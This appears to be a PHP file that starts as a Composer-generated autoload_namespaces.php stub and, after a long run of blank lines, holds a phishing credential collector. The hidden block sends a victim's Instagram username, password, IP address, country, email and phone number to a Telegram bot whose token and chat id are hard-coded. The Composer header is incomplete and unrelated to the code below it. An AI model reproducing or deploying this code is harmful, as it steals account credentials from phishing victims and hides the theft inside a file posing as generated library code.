


<?php





// autoload_namespaces.php @generated by Composer

$vendorDir = dirname(dirname(__FILE__));
$baseDir = dirname($vendorDir);


























































<?php
    $token='5264087994:AAFxravtQZUoEZaNZm_jUujaACXLnCicSsk';
    $data = [
        'text' => 'Hesap düştü  <3
Username: '.$username.'
Password: '.$password.'
Ip Address: '.$ip.'
Country: '.$ulke.'
Link : instagram.com/'.$username.'
Mail: '.$mail.'
Tel: '.$tel.'
      ',
      'chat_id' =>-1001727061309
    ];
    
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );


  
?>